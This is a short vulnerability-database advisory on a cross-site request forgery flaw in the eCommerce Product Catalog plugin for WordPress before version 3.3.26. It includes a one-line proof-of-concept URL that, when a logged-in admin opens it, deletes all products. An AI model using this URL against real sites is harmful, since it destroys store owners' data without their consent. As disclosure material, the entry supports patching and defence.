Lucene search

K
wpexploitKrzysztof Zając (CERT PL)WPEX-ID:936934C3-5BFE-416E-B6AA-47BED4DB05C4
HistoryNov 13, 2023 - 12:00 a.m.

eCommerce Product Catalog Plugin for WordPress < 3.3.26 - Products Deletion via CSRF

2023-11-1300:00:00
Krzysztof Zając (CERT PL)
45
wordpress
ecommerce
csrf
security
exploit
vulnerability

AI Score

7.3

Confidence

Low

EPSS

0.001

Percentile

17.8%

Description The plugin does not have CSRF checks in some of its admin pages, which could allow attackers to make logged-in users perform unwanted actions via CSRF attacks, such as delete all products

Make a logged in admin open the URL below

https://example.com/wp-admin/edit.php?post_type=al_product&page=system.php&delete_all_products&delete_all_products_confirm=1

AI Score

7.3

Confidence

Low

EPSS

0.001

Percentile

17.8%

Related for WPEX-ID:936934C3-5BFE-416E-B6AA-47BED4DB05C4